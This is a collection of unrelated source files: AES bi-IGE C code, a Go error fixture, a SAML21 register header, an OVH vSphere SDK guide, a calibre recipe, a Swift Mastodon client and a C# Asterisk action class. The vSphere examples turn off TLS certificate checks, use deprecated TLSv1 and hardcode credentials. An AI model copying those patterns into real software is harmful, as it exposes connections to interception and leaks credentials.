 * ivec must supply 4 * AES_BLOCK_SIZE bytes: IV pair 0/1 for the forward
 * pass and IV pair 2/3 for the backward pass.  Unlike AES_ige_encrypt,
 * ivec is not updated — no chaining is possible (see note above).
 *
 * NOTE(review): the |key2| parameter is accepted but never referenced in
 * this body; both passes use |key|.  Confirm whether the second pass was
 * intended to use |key2|.
 */
void AES_bi_ige_encrypt(const unsigned char *in, unsigned char *out,
                        size_t length, const AES_KEY *key,
                        const AES_KEY *key2, const unsigned char *ivec,
                        const int enc)
{
    size_t n;
    size_t len = length;
    unsigned char tmp[AES_BLOCK_SIZE];
    unsigned char tmp2[AES_BLOCK_SIZE];
    unsigned char tmp3[AES_BLOCK_SIZE];
    unsigned char prev[AES_BLOCK_SIZE];
    const unsigned char *iv;
    const unsigned char *iv2;

    OPENSSL_assert(in && out && key && ivec);
    OPENSSL_assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc));
    OPENSSL_assert((length % AES_BLOCK_SIZE) == 0);

    if (AES_ENCRYPT == enc) {
        /*
         * XXX: Do a separate case for when in != out (strictly should check
         * for overlap, too)
         */

        /* First the forward pass */
        iv = ivec;
        iv2 = ivec + AES_BLOCK_SIZE;
        while (len >= AES_BLOCK_SIZE) {
            /* Standard IGE step: C[i] = E(P[i] ^ C[i-1]) ^ P[i-1]. */
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] = in[n] ^ iv[n];
            AES_encrypt(out, out, key);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] ^= iv2[n];
            iv = out;
            /* prev keeps the plaintext block for the next iteration. */
            memcpy(prev, in, AES_BLOCK_SIZE);
            iv2 = prev;
            len -= AES_BLOCK_SIZE;
            in += AES_BLOCK_SIZE;
            out += AES_BLOCK_SIZE;
        }

        /* And now backwards: re-encrypt the output from last block to
         * first, using the second IV pair. */
        iv = ivec + AES_BLOCK_SIZE * 2;
        iv2 = ivec + AES_BLOCK_SIZE * 3;
        len = length;
        while (len >= AES_BLOCK_SIZE) {
            out -= AES_BLOCK_SIZE;
            /*
             * XXX: reduce copies by alternating between buffers
             */
            /* tmp keeps this block's pre-pass value for the feedback. */
            memcpy(tmp, out, AES_BLOCK_SIZE);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] ^= iv[n];
            /*
             * hexdump(stdout, "out ^ iv", out, AES_BLOCK_SIZE);
             */
            AES_encrypt(out, out, key);
            /*
             * hexdump(stdout,"enc", out, AES_BLOCK_SIZE);
             */
            /*
             * hexdump(stdout,"iv2", iv2, AES_BLOCK_SIZE);
             */
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] ^= iv2[n];
            /*
             * hexdump(stdout,"out", out, AES_BLOCK_SIZE);
             */
            iv = out;
            memcpy(prev, tmp, AES_BLOCK_SIZE);
            iv2 = prev;
            len -= AES_BLOCK_SIZE;
        }
    } else {
        /* Decrypt: undo the passes in reverse order. */

        /* First backwards */
        iv = ivec + AES_BLOCK_SIZE * 2;
        iv2 = ivec + AES_BLOCK_SIZE * 3;
        /* Walk the buffers from the end towards the start. */
        in += length;
        out += length;
        while (len >= AES_BLOCK_SIZE) {
            in -= AES_BLOCK_SIZE;
            out -= AES_BLOCK_SIZE;
            /* tmp is XORed in place; tmp2/tmp3 preserve the ciphertext
             * for the next iteration's feedback. */
            memcpy(tmp, in, AES_BLOCK_SIZE);
            memcpy(tmp2, in, AES_BLOCK_SIZE);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                tmp[n] ^= iv2[n];
            AES_decrypt(tmp, out, key);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] ^= iv[n];
            memcpy(tmp3, tmp2, AES_BLOCK_SIZE);
            iv = tmp3;
            iv2 = out;
            len -= AES_BLOCK_SIZE;
        }

        /* And now forwards */
        iv = ivec;
        iv2 = ivec + AES_BLOCK_SIZE;
        len = length;
        while (len >= AES_BLOCK_SIZE) {
            memcpy(tmp, out, AES_BLOCK_SIZE);
            memcpy(tmp2, out, AES_BLOCK_SIZE);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                tmp[n] ^= iv2[n];
            AES_decrypt(tmp, out, key);
            for (n = 0; n < AES_BLOCK_SIZE; ++n)
                out[n] ^= iv[n];
            memcpy(tmp3, tmp2, AES_BLOCK_SIZE);
            iv = tmp3;
            iv2 = out;
            len -= AES_BLOCK_SIZE;
            in += AES_BLOCK_SIZE;
            out += AES_BLOCK_SIZE;
        }
    }
}
| {
"pile_set_name": "Github"
} |
libbar/blah.go:3:8: cannot find package "xxx" in any of:
D:\devel\tools.Go\go1.3.2.windows-386\go\src\pkg\fmt222 (from $GOROOT)
D:\devel\tools.Go\go-workspace\src\fmt222 (from $GOPATH)
../MyGoLibFoo/libfoo/blah.go:3:8: cannot find package "yyy" in any of:
D:\devel\tools.Go\go1.3.2.windows-386\go\src\pkg\fmt22 (from $GOROOT)
D:\devel\tools.Go\go-workspace\src\fmt22 (from $GOPATH)
$$TESTRESOURCE_SAMPLE_GOPATH_ENTRY$$/src/samplePackage/foo.go:3:2: cannot find package "zzz" in any of:
D:\devel\tools.Go\go1.3.2.windows-386\go\src\pkg\fmt22 (from $GOROOT)
D:\devel\tools.Go\go-workspace\src\fmt22 (from $GOPATH) | {
"pile_set_name": "Github"
} |
/**
* \file
*
* \brief Instance description for TCC0
*
* Copyright (c) 2018 Microchip Technology Inc.
*
* \asf_license_start
*
* \page License
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the Licence at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an AS IS BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* \asf_license_stop
*
*/
#ifndef _SAML21_TCC0_INSTANCE_
#define _SAML21_TCC0_INSTANCE_
/* ========== Register definition for TCC0 peripheral ========== */
#if (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__))
#define REG_TCC0_CTRLA (0x42001400) /**< \brief (TCC0) Control A */
#define REG_TCC0_CTRLBCLR (0x42001404) /**< \brief (TCC0) Control B Clear */
#define REG_TCC0_CTRLBSET (0x42001405) /**< \brief (TCC0) Control B Set */
#define REG_TCC0_SYNCBUSY (0x42001408) /**< \brief (TCC0) Synchronization Busy */
#define REG_TCC0_FCTRLA (0x4200140C) /**< \brief (TCC0) Recoverable Fault A Configuration */
#define REG_TCC0_FCTRLB (0x42001410) /**< \brief (TCC0) Recoverable Fault B Configuration */
#define REG_TCC0_WEXCTRL (0x42001414) /**< \brief (TCC0) Waveform Extension Configuration */
#define REG_TCC0_DRVCTRL (0x42001418) /**< \brief (TCC0) Driver Control */
#define REG_TCC0_DBGCTRL (0x4200141E) /**< \brief (TCC0) Debug Control */
#define REG_TCC0_EVCTRL (0x42001420) /**< \brief (TCC0) Event Control */
#define REG_TCC0_INTENCLR (0x42001424) /**< \brief (TCC0) Interrupt Enable Clear */
#define REG_TCC0_INTENSET (0x42001428) /**< \brief (TCC0) Interrupt Enable Set */
#define REG_TCC0_INTFLAG (0x4200142C) /**< \brief (TCC0) Interrupt Flag Status and Clear */
#define REG_TCC0_STATUS (0x42001430) /**< \brief (TCC0) Status */
#define REG_TCC0_COUNT (0x42001434) /**< \brief (TCC0) Count */
#define REG_TCC0_PATT (0x42001438) /**< \brief (TCC0) Pattern */
#define REG_TCC0_WAVE (0x4200143C) /**< \brief (TCC0) Waveform Control */
#define REG_TCC0_PER (0x42001440) /**< \brief (TCC0) Period */
#define REG_TCC0_CC0 (0x42001444) /**< \brief (TCC0) Compare and Capture 0 */
#define REG_TCC0_CC1 (0x42001448) /**< \brief (TCC0) Compare and Capture 1 */
#define REG_TCC0_CC2 (0x4200144C) /**< \brief (TCC0) Compare and Capture 2 */
#define REG_TCC0_CC3 (0x42001450) /**< \brief (TCC0) Compare and Capture 3 */
#define REG_TCC0_PATTBUF (0x42001464) /**< \brief (TCC0) Pattern Buffer */
#define REG_TCC0_WAVEBUF (0x42001468) /**< \brief (TCC0) Waveform Control Buffer */
#define REG_TCC0_PERBUF (0x4200146C) /**< \brief (TCC0) Period Buffer */
#define REG_TCC0_CCBUF0 (0x42001470) /**< \brief (TCC0) Compare and Capture Buffer 0 */
#define REG_TCC0_CCBUF1 (0x42001474) /**< \brief (TCC0) Compare and Capture Buffer 1 */
#define REG_TCC0_CCBUF2 (0x42001478) /**< \brief (TCC0) Compare and Capture Buffer 2 */
#define REG_TCC0_CCBUF3 (0x4200147C) /**< \brief (TCC0) Compare and Capture Buffer 3 */
#else
#define REG_TCC0_CTRLA (*(RwReg *)0x42001400UL) /**< \brief (TCC0) Control A */
#define REG_TCC0_CTRLBCLR (*(RwReg8 *)0x42001404UL) /**< \brief (TCC0) Control B Clear */
#define REG_TCC0_CTRLBSET (*(RwReg8 *)0x42001405UL) /**< \brief (TCC0) Control B Set */
#define REG_TCC0_SYNCBUSY (*(RoReg *)0x42001408UL) /**< \brief (TCC0) Synchronization Busy */
#define REG_TCC0_FCTRLA (*(RwReg *)0x4200140CUL) /**< \brief (TCC0) Recoverable Fault A Configuration */
#define REG_TCC0_FCTRLB (*(RwReg *)0x42001410UL) /**< \brief (TCC0) Recoverable Fault B Configuration */
#define REG_TCC0_WEXCTRL (*(RwReg *)0x42001414UL) /**< \brief (TCC0) Waveform Extension Configuration */
#define REG_TCC0_DRVCTRL (*(RwReg *)0x42001418UL) /**< \brief (TCC0) Driver Control */
#define REG_TCC0_DBGCTRL (*(RwReg8 *)0x4200141EUL) /**< \brief (TCC0) Debug Control */
#define REG_TCC0_EVCTRL (*(RwReg *)0x42001420UL) /**< \brief (TCC0) Event Control */
#define REG_TCC0_INTENCLR (*(RwReg *)0x42001424UL) /**< \brief (TCC0) Interrupt Enable Clear */
#define REG_TCC0_INTENSET (*(RwReg *)0x42001428UL) /**< \brief (TCC0) Interrupt Enable Set */
#define REG_TCC0_INTFLAG (*(RwReg *)0x4200142CUL) /**< \brief (TCC0) Interrupt Flag Status and Clear */
#define REG_TCC0_STATUS (*(RwReg *)0x42001430UL) /**< \brief (TCC0) Status */
#define REG_TCC0_COUNT (*(RwReg *)0x42001434UL) /**< \brief (TCC0) Count */
#define REG_TCC0_PATT (*(RwReg16*)0x42001438UL) /**< \brief (TCC0) Pattern */
#define REG_TCC0_WAVE (*(RwReg *)0x4200143CUL) /**< \brief (TCC0) Waveform Control */
#define REG_TCC0_PER (*(RwReg *)0x42001440UL) /**< \brief (TCC0) Period */
#define REG_TCC0_CC0 (*(RwReg *)0x42001444UL) /**< \brief (TCC0) Compare and Capture 0 */
#define REG_TCC0_CC1 (*(RwReg *)0x42001448UL) /**< \brief (TCC0) Compare and Capture 1 */
#define REG_TCC0_CC2 (*(RwReg *)0x4200144CUL) /**< \brief (TCC0) Compare and Capture 2 */
#define REG_TCC0_CC3 (*(RwReg *)0x42001450UL) /**< \brief (TCC0) Compare and Capture 3 */
#define REG_TCC0_PATTBUF (*(RwReg16*)0x42001464UL) /**< \brief (TCC0) Pattern Buffer */
#define REG_TCC0_WAVEBUF (*(RwReg *)0x42001468UL) /**< \brief (TCC0) Waveform Control Buffer */
#define REG_TCC0_PERBUF (*(RwReg *)0x4200146CUL) /**< \brief (TCC0) Period Buffer */
#define REG_TCC0_CCBUF0 (*(RwReg *)0x42001470UL) /**< \brief (TCC0) Compare and Capture Buffer 0 */
#define REG_TCC0_CCBUF1 (*(RwReg *)0x42001474UL) /**< \brief (TCC0) Compare and Capture Buffer 1 */
#define REG_TCC0_CCBUF2 (*(RwReg *)0x42001478UL) /**< \brief (TCC0) Compare and Capture Buffer 2 */
#define REG_TCC0_CCBUF3 (*(RwReg *)0x4200147CUL) /**< \brief (TCC0) Compare and Capture Buffer 3 */
#endif /* (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) */
/* ========== Instance parameters for TCC0 peripheral ========== */
#define TCC0_CC_NUM                 4        // Number of Compare/Capture units
#define TCC0_DITHERING              1        // Dithering feature implemented
#define TCC0_DMAC_ID_MC_0           12       // DMA trigger ID, match/compare channel 0
#define TCC0_DMAC_ID_MC_1           13       // DMA trigger ID, match/compare channel 1
#define TCC0_DMAC_ID_MC_2           14       // DMA trigger ID, match/compare channel 2
#define TCC0_DMAC_ID_MC_3           15       // DMA trigger ID, match/compare channel 3
#define TCC0_DMAC_ID_MC_LSB         12       // Lowest match/compare DMA trigger ID
#define TCC0_DMAC_ID_MC_MSB         15       // Highest match/compare DMA trigger ID
#define TCC0_DMAC_ID_MC_SIZE        4        // Number of match/compare DMA triggers
#define TCC0_DMAC_ID_OVF            11       // DMA overflow/underflow/retrigger trigger
#define TCC0_DTI                    1        // Dead-Time-Insertion feature implemented
#define TCC0_EXT                    31       // Coding of implemented extended features
#define TCC0_GCLK_ID                25       // Index of Generic Clock
#define TCC0_OTMX                   1        // Output Matrix feature implemented
#define TCC0_OW_NUM                 8        // Number of Output Waveforms
#define TCC0_PG                     1        // Pattern Generation feature implemented
#define TCC0_SIZE                   24       // Size parameter (presumably counter width in bits — confirm with datasheet)
#define TCC0_SWAP                   1        // DTI outputs swap feature implemented
#define TCC0_TYPE                   1        // TCC type 0 : NA, 1 : Master, 2 : Slave
#endif /* _SAML21_TCC0_INSTANCE_ */
| {
"pile_set_name": "Github"
} |
---
title: Using the vSphere SDK
slug: using-sdk-vsphere
excerpt: Find out how to implement and use the vSphere SDK
section: VMware vSphere features
order: 10
---
**Last updated 13th July 2020**
## Objective
Actions within your infrastructure can be automated using the vSphere SDK.
**This guide explains the implementation and usage in various programming languages.**
## Instructions
### Python
#### Setting up the environment
##### OS
This example uses a VM installed with Debian 9, deployed from [templates available for your Hosted Private Cloud infrastructure](https://docs.ovh.com/gb/en/private-cloud/deploy-ovh-template/).
##### Requirements
It is necessary to install these packages:
```
apt-get install python git python-pip
```
##### vSphere SDK
Download the vSphere SDK with the following command:
```
git clone https://github.com/vmware/vsphere-automation-sdk-python.git
```
The directory "/vsphere-automation-sdk-python" will be created. Switch to this folder to perform the installation command:
```
pip install --upgrade --force-reinstall -r requirements.txt --extra-index-url file:///<absolute_path_to_sdk>/lib
```
In this example, it is the following command:
```
pip install --upgrade --force-reinstall -r requirements.txt --extra-index-url file:///root/vsphere-automation-sdk-python/lib
```
Once the SDK is installed, you can make use of scripts.
#### Script example
##### Connection
This example tests the connection and disconnection to vCenter. It will also help to verify if everything is properly installed.
```python
#!/usr/bin/env python
import time
import atexit
import ssl
from pyVim import connect
from pyVmomi import vim
def vconnect():
s = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
s.verify_mode = ssl.CERT_NONE
service_instance = connect.SmartConnect(host="pcc-149-202-xxx-xxx.ovh.com",
user="damien",
pwd="MyPassword",
sslContext=s)
atexit.register(connect.Disconnect, service_instance)
print("Connecting....")
time.sleep(2)
print("Disconnecting..")
vconnect()
```
##### Listing the VMs of a Private Cloud infrastructure
This example lists all VMs of a Private Cloud infrastructure.
```python
#!/usr/bin/env python
import time
import atexit
import ssl
from pyVim import connect
from pyVmomi import vim
def vconnect():
s = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
s.verify_mode = ssl.CERT_NONE
service_instance = connect.SmartConnect(host="pcc-149-202-xxx-xxx.ovh.com",
user="damien",
pwd="MyPassword",
sslContext=s)
atexit.register(connect.Disconnect, service_instance)
print("Connecting....")
time.sleep(2)
content = service_instance.RetrieveContent()
container = content.rootFolder
viewType = [vim.VirtualMachine]
recursive = True
containerView = content.viewManager.CreateContainerView(container, viewType, recursive)
children = containerView.view
for child in children:
summary = child.summary
print(summary.config.name)
time.sleep(2)
print("Disconnecting...")
vconnect()
```
### Perl
#### Setting up the environment
##### OS
This example uses a VM installed with Ubuntu 18.04, deployed from [templates available for your Hosted Private Cloud infrastructure](https://docs.ovh.com/gb/en/private-cloud/deploy-ovh-template/).
##### Requirements
It is necessary to install these packages:
```
apt-get install lib32z1 lib32ncurses5 uuid uuid-dev libssl-dev perl-doc libxml-libxml-perl libcrypt-ssleay-perl libsoap-lite-perl libdata-compare-perl libmodule-build-perl libuuid-perl libsocket6-perl libnet-inet6glue-perl libarchive-zip-perl
```
```
cpan install Crypt::OpenSSL::RSA UUID::Random Exception::Class Crypt::X509 List::MoreUtils
```
##### vSphere SDK
Download the vSphere SDK using this link:
[https://my.vmware.com/group/vmware/get-download?downloadGroup=VS-PERL-SDK67](https://my.vmware.com/group/vmware/get-download?downloadGroup=VS-PERL-SDK67)
Make sure to download the version that is compatible with your operating system.
In this example the file downloaded is: "VMware-vSphere-Perl-SDK-6.7.0-8156551.x86_64.tar.gz"
Extract the file you just downloaded using this command:
```
tar -zxvf VMware-vSphere-Perl-SDK-6.7.0-8156551.x86_64.tar.gz
```
Start the installer using the following commands:
```
cd vmware-vsphere-cli-distrib
```
```
./vmware-install.pl
```
After reading the terms, accept them and continue by pressing `Enter`{.action}.
After the installation, additional modules will be installed. Hit `Enter`{.action} to continue the installation.
In order to complete the installation, you will need to select a directory in which the SDK will install. By default, the directory is "/usr/bin".
#### Script example
##### Connection
This example tests the connection and disconnection to vCenter. It will also help to verify if everything is properly installed.
```perl
#!/usr/bin/perl
use strict;
use VMware::VIRuntime;
Opts::set_option('server', 'pcc-149-202-xxx-xxx.ovh.com');
Opts::set_option('username', 'damien');
Opts::set_option('password', 'MyPassword');
print "Connecting \n";
Util::connect();
Util::disconnect();
print "Disconnected \n";
```
##### Listing the VMs of a Private Cloud infrastructure
This example lists all VMs of a Private Cloud infrastructure.
```perl
#!/usr/bin/perl
use strict;
use Data::Dumper;
use VMware::VIRuntime;
Opts::set_option('server', 'pcc-149-202-xxx-xxx.ovh.com');
Opts::set_option('username', 'damien');
Opts::set_option('password', 'MyPassword');
print "Connecting \n";
Util::connect();
my $vm_views =
Vim::find_entity_views(view_type => 'VirtualMachine',
properties => ['name'], );
foreach my $view ( sort @$vm_views) {
print ' - '.$view->{'name'}, "\n";
}
Util::disconnect();
print "Disconnected \n";
```
##### Using samples
In this example, a script that is already created and present in the directory "vmware-vsphere-cli-distrib/apps/vm/" is called.
Here is a list of the scripts already available in this directory:
```
ls vmware-vsphere-cli-distrib/apps/vm/
guestinfo.pl sharesmanager.pl snapshotmanager.pl vdiskcreate.pl vmclone.pl vmcontrol.pl vmcreate.pl vminfo.pl vmmigrate.pl vmreconfig.pl vmregister.pl vmsnapshot.pl vmtemplate.pl
```
To create a snapshot "test" of the VM "Debian1", use this command (replacing the example placeholders with your credentials):
```
perl snapshotmanager.pl --server pcc-149-202-xxx-xxx.ovh.com --username damien --password MyPassword --operation create --vmname Debian1 --snapshotname test
```
## Go further
Join our community of users on <https://community.ovh.com/en/>.
| {
"pile_set_name": "Github"
} |
from calibre.web.feeds.news import BasicNewsRecipe
from calibre.ebooks.BeautifulSoup import Tag
def new_tag(soup, name, attrs=()):
    """Create a new tag named ``name`` for ``soup``.

    Prefers the soup object's own ``new_tag`` factory when available;
    otherwise falls back to constructing a ``Tag`` directly (for
    BeautifulSoup variants whose soup has no such factory).
    """
    factory = getattr(soup, 'new_tag', None)
    if factory is None:
        return Tag(soup, name, attrs=attrs or None)
    return factory(name, attrs=dict(attrs))
class VrijNederlandRecipe(BasicNewsRecipe):
    """Calibre news recipe for the Dutch weekly 'Vrij Nederland' (vn.nl)."""

    __license__ = 'GPL v3'
    __author__ = 'kwetal'
    language = 'nl'
    locale = 'nl'
    version = 1

    title = u'Vrij Nederland'
    publisher = u'Weekbladpers Tijdschriften'
    category = u'News, Opinion'
    description = u'Weekly opinion magazine from the Netherlands'

    # Fetch window and per-feed size limit.
    oldest_article = 7
    max_articles_per_feed = 100
    use_embedded_content = False

    no_stylesheets = True
    remove_javascript = True

    conversion_options = {'publisher': publisher,
                          'tags': category, 'comments': description}

    # Topical section feeds followed by individual columnists' feeds.
    feeds = []
    feeds.append((u'Politiek', u'http://www.vn.nl/politiek.rss'))
    feeds.append((u'Buitenland', u'http://www.vn.nl/buitenland.rss'))
    feeds.append((u'Economie', u'http://www.vn.nl/economie.rss'))
    feeds.append((u'Justitie', u'http://www.vn.nl/justitie.rss'))
    feeds.append((u'Samenleving', u'http://www.vn.nl/samenleving.rss'))
    feeds.append((u'Crime', u'http://www.vn.nl/crime.rss'))
    feeds.append((u'Media', u'http://www.vn.nl/media.rss'))
    feeds.append((u'De Republiek der Letteren',
                  u'http://www.vn.nl/republiek.rss'))
    feeds.append((u'Max van Weezel', u'http://www.vn.nl/vanweezel.rss'))
    feeds.append((u'Ko Colijn', u'http://www.vn.nl/colijn.rss'))
    feeds.append((u'Kees Kraaijeveld', u'http://www.vn.nl/kraaijeveld.rss'))
    feeds.append((u'Frank Kalshoven', u'http://www.vn.nl/kalshoven.rss'))
    feeds.append((u'Stephan Sanders', u'http://www.vn.nl/sanders.rss'))
    feeds.append((u'Micha Wertheim', u'http://www.vn.nl/wertheim.rss'))
    feeds.append((u'Arnon Grunberg', u'http://www.vn.nl/grunberg.rss'))
    feeds.append((u'Carel Peeters', u'http://www.vn.nl/carelpeeters.rss'))

    # Keep only the main article column of each page.
    keep_only_tags = [
        dict(name='div', attrs={'class': 'cl-column column-one'})]

    # Strip guest book, forum form, media widgets and non-content tags.
    remove_tags = []
    remove_tags.append(
        dict(name='div', attrs={'class': 'wpg-element guest-book-overview'}))
    remove_tags.append(
        dict(name='div', attrs={'class': 'wpg-element forum-message-form'}))
    remove_tags.append(dict(name='div', attrs={'class': 'mediaterms'}))
    remove_tags.append(dict(name='div', attrs={'class': 'label-term'}))
    remove_tags.append(dict(name='div', attrs={
        'class': 'wpg-element Media-Collection-Element-Artikel-Lijst'}))
    remove_tags.append(dict(name='object'))
    remove_tags.append(dict(name='link'))
    remove_tags.append(dict(name='meta'))

    def preprocess_html(self, soup):
        """Tidy an article page: drop metadata link/separator spans and
        replace the original <head> (full of IE conditionals) with an
        empty one."""
        # Just clean up the result a little
        meta = soup.find('div', attrs={'class': 'meta'})
        if meta:
            link = meta.find('span', attrs={'class': 'link'})
            if link:
                link.extract()
            for seperator in meta.findAll('span', attrs={'class': 'seperator'}):
                seperator.extract()

        # Their header is full of 'if IE6/7/8' tags. Just get rid of it
        # altogether
        theirHead = soup.head
        theirHead.extract()

        myHead = new_tag(soup, 'head')
        soup.insert(0, myHead)

        return soup
| {
"pile_set_name": "Github"
} |
//
// Client.swift
// MastodonKit
//
// Created by Ornithologist Coder on 4/22/17.
// Copyright © 2017 MastodonKit. All rights reserved.
//
import Foundation
/// HTTP client for a single Mastodon instance.
///
/// Builds URLs from `Request` values, performs them on a background queue,
/// and decodes the response into either a typed model or a `ClientError`.
public struct Client: ClientType {
    /// Base URL of the instance this client talks to.
    let baseURL: String
    /// Session used for all network calls (injectable; defaults to `.shared`).
    let session: URLSession
//    enum Constant: String {
//        case sessionID = "com.shi.Mast.bgSession"
//    }
//    var session: URLSession = {
//        let config = URLSessionConfiguration.background(withIdentifier: Constant.sessionID.rawValue)
//        config.isDiscretionary = true
//        config.sessionSendsLaunchEvents = true
//        return URLSession(configuration: config, delegate: nil, delegateQueue: nil)
//    }()
    /// OAuth access token; passed into each URLRequest when set.
    public var accessToken: String?

    /// Creates a client for `baseURL`, optionally authenticated with
    /// `accessToken`, using `session` for transport.
    public init(baseURL: String, accessToken: String? = nil, session: URLSession = .shared) {
        self.baseURL = baseURL
        self.session = session
        self.accessToken = accessToken
    }

    /// Runs `request` asynchronously and reports the outcome via `completion`.
    ///
    /// Failure cases, in order of detection: malformed URL, transport error,
    /// missing response body, non-200 status (decoded into a Mastodon error
    /// message when possible, otherwise `.genericError`), and model decoding
    /// failure.  On success the decoded model and the response's pagination
    /// value are delivered.
    public func run<Model>(_ request: Request<Model>, completion: @escaping (Result<Model>) -> Void) {
        DispatchQueue.global(qos: .userInitiated).async {
            guard
                let components = URLComponents(baseURL: self.baseURL, request: request),
                let url = components.url
                else {
                    completion(.failure(ClientError.malformedURL))
                    return
            }

            let urlRequest = URLRequest(url: url, request: request, accessToken: self.accessToken)
            let task = self.session.dataTask(with: urlRequest) { data, response, error in
                // Transport-level failure (no usable HTTP response).
                if let error = error {
                    completion(.failure(error))
                    return
                }

                guard let data = data else {
                    completion(.failure(ClientError.malformedJSON))
                    return
                }

                // Non-200: try to surface the server-provided error message.
                guard
                    let httpResponse = response as? HTTPURLResponse,
                    httpResponse.statusCode == 200
                    else {
                        let mastodonError = try? MastodonError.decode(data: data)
                        let error: ClientError = mastodonError.map { .mastodonError($0.description) } ?? .genericError
                        completion(.failure(error))
                        return
                }

                guard let model = try? Model.decode(data: data) else {
                    completion(.failure(ClientError.invalidModel))
                    return
                }

                completion(.success(model, httpResponse.pagination))
            }

            task.resume()
        }
    }
}
| {
"pile_set_name": "Github"
} |
using System.Collections.Generic;
using AsterNET.Manager.Response;
namespace AsterNET.Manager.Action
{
/// <summary>
/// The UpdateConfigAction sends an UpdateConfig command to the asterisk server.
/// Please take note that unlike the manager documentation, this command does not
/// dump back the config file upon success -- it only tells you it succeeded. You
/// should use the handy addCommand method this class provides for specifying
/// what actions you would like to take on the configuration file. It will
/// generate appropriate sequence numbers for the command. You may use the static
/// ACTION_* fields provided by this action to specify what action you would like
/// to take, while avoiding handling the strings required. Plain fields:<br />
/// SrcFilename: Configuration filename to read(e.g. foo.conf)<br />
/// DstFilename: Configuration filename to write(e.g. foo.conf)<br />
/// Reload: Whether or not a reload should take place (or name of specific module)<br />
/// Repeatable fields:<br />
/// Action-XXXXXX: Action to Take (NewCat,RenameCat,DelCat,Update,Delete,Append)<br />
/// Cat-XXXXXX: Category to operate on<br />
/// Var-XXXXXX: Variable to work on<br />
/// Value-XXXXXX: Value to work on<br />
/// Match-XXXXXX: Extra match required to match line
/// </summary>
public class UpdateConfigAction : ManagerActionResponse
{
public const string ACTION_NEWCAT = "newcat";
public const string ACTION_RENAMECAT = "renamecat";
public const string ACTION_DELCAT = "delcat";
public const string ACTION_UPDATE = "update";
public const string ACTION_DELETE = "delete";
public const string ACTION_APPEND = "append";
private readonly Dictionary<string, string> actions;
private int actionCounter;
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction()
{
actionCounter = 0;
actions = new Dictionary<string, string>();
}
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction(string srcFilename, string dstFilename, string reload)
: this()
{
SrcFileName = srcFilename;
DstFileName = dstFilename;
this.Reload = reload;
}
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction(string srcFilename, string dstFilename, bool reload)
: this()
{
SrcFileName = srcFilename;
DstFileName = dstFilename;
this.Reload = (reload ? "true" : "");
}
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction(string srcFilename, string dstFilename)
: this()
{
SrcFileName = srcFilename;
DstFileName = dstFilename;
Reload = "";
}
/// <summary>
/// Get/Set the destination filename.
/// </summary>
public string DstFileName { get; set; }
/// <summary>
/// Get/Set the source filename.
/// </summary>
public string SrcFileName { get; set; }
/// <summary>
/// Get/Set the reload behavior of this action (yes), or sets a specific module (name) to be reloaded.<br />
/// Set to empty string to update without reload.
/// </summary>
public string Reload { get; set; }
/// <summary>
/// Get the name of this action.
/// </summary>
public override string Action
{
get { return "UpdateConfig"; }
}
#region AddCommand(...)
/// <summary>
/// Adds a command to update a config file while sparing you the details of
/// the Manager's required syntax. If you want to omit one of the command's
/// sections, provide a null value to this method. The command index will be
/// incremented even if you supply a null for all parameters, though the action
/// will be unaffected.
/// </summary>
/// <param name="action">Action to Take (NewCat,RenameCat,DelCat,Update,Delete,Append)</param>
/// <param name="category">Category to operate on</param>
/// <param name="variable">Variable to work on</param>
/// <param name="value">Value to work on</param>
/// <param name="match">Extra match required to match line</param>
/// <param name="options">Extra match required to match line</param>
public void AddCommand(string action, string category, string variable, string value, string match, string options)
{
var i = actionCounter++;
var index = i.ToString().PadLeft(6, '0');
if (!string.IsNullOrEmpty(action))
actions.Add("Action-" + index, action);
if (!string.IsNullOrEmpty(category))
actions.Add("Cat-" + index, category);
if (!string.IsNullOrEmpty(variable))
actions.Add("Var-" + index, variable);
if (!string.IsNullOrEmpty(value))
actions.Add("Value-" + index, value);
if (!string.IsNullOrEmpty(match))
actions.Add("Match-" + index, match);
if (!string.IsNullOrEmpty(options))
Actions.Add("Options-" + index, options);
}
public void AddCommand(string action, string category, string variable, string value, string match)
{
AddCommand(action, category, variable, value, match, null);
}
public void AddCommand(string action, string category, string variable, string value)
{
AddCommand(action, category, variable, value, null, null);
}
public void AddCommand(string action, string category, string variable)
{
AddCommand(action, category, variable, null, null, null);
}
public void AddCommand(string action, string category)
{
AddCommand(action, category, null, null, null, null);
}
public void AddCommand(string action)
{
AddCommand(action, null, null, null, null, null);
}
public void AddCommand()
{
AddCommand(null, null, null, null, null, null);
}
#endregion
#region Actions
/// <summary>
/// Dictionary of the action's desired operations where Map keys contain:<br />
/// action,cat,var,value,match pairs followed by -XXXXXX, and the values contain the values for those keys.
/// This method will typically only be used by the ActionBuilder to generate the actual strings to be sent to the
/// manager interface.
/// </summary>
public Dictionary<string, string> Actions
{
get { return actions; }
}
#endregion
public override object ActionCompleteResponseClass()
{
return new ManagerResponse();
}
}
} | {
"pile_set_name": "Github"
} |
ramstage-$(CONFIG_DRIVERS_INTEL_SOUNDWIRE) += soundwire.c
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
# Scraper for Pennsylvania Supreme Court
# CourtID: pa
# Court Short Name: pa
import re
from juriscraper.OpinionSite import OpinionSite
